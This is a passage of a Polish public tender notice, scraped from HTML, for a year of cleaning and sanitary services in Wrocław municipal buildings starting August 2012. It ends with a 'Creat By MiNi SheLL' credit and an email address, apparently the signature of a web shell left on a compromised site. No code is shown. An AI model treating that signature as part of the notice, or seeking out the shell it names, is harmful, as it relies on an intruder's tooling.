3.Przez usługi porządkowo - sanitarne i sprzątania w budynkach gminnych Zamawiający rozumie wykonywanie czynności określonych w Opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SIWZ związanych z utrzymaniem czystości i porządku w częściach wspólnych budynków stanowiących własność Gminy Wrocław objętych ewidencją zasobu prowadzoną przez spółkę Wrocławskie Mieszkania Sp. z o.o., które będą rozliczane na podstawie miesięcznych cen jednostkowych netto za usługi porządkowo - sanitarne i sprzątania 1 m2 powierzchni wspólnego użytku.
4.Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający dopuszcza możliwość wyłączenia poszczególnych budynków z wykonywania usług porządkowo - sanitarnych i sprzątania w następujących przypadkach: 
a)sprzedaży pierwszego lokalu w budynku stanowiącym własność Gminy Wrocław i utraty przez ten budynek statusu nieruchomości komunalnej,
b)wyłączenia budynku z eksploatacji (np. rozbiórka, remont),
c)przekazania nieruchomości objętej umową innemu podmiotowi w zarządzanie.
Zamawiający powiadomi pisemnie Wykonawcę o zmianie adresu nieruchomości wymienionych w załączniku nr 2 do umowy lub o wyłączeniu budynku z wykonywania usług porządkowo - sanitarnych i sprzątania. Wykonawcy nie przysługują z tytułu zmniejszenia zakresu umowy roszczenia odszkodowawcze. 
5.Zakres usług objętych przedmiotem zamówienia określa załącznik nr 5 do SIWZ. 
6.Szczegółowy wykaz zasobów Gminy, na których realizowany będzie przedmiot zamówienia zawiera załącznik nr 6 do SIWZ. 
Termin wykonania zamówienia: 12 miesięcy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 12 sierpnia 2012 roku w każdym zadaniu z zastrzeżeniem, że umowa ulega rozwiązaniu w danym zadaniu przed tym terminem w razie zrealizowania przedmiotu umowy za wynagrodzeniem łącznym brutto określonym w § 5 ust.1 umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com